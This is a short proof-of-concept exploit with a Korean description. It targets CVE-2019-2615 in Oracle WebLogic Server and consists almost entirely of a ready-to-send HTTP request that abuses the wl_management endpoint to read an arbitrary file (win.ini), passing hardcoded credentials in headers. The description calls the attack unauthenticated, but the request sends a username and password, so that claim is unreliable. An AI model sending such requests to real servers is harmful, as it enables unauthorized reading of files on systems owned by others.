
Oracle WebLogic Server를 대상으로 하는 CVE-2019-2615에 대한 개념 증명 익스플로잇입니다. 조작된 HTTP 요청을 통한 인증되지 않은 경로 탐색으로 임의 파일을 읽을 수 있음을 보여줍니다.
GET /bea_wls_management_internal2/wl_management HTTP/1.1
Host: 192.168.5.137:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
username:weblogic
password:admin123456
wl_request_type:wl_jsp_refresh_request
adminPath:c:\windows\win.ini
Upgrade-Insecure-Requests: 1
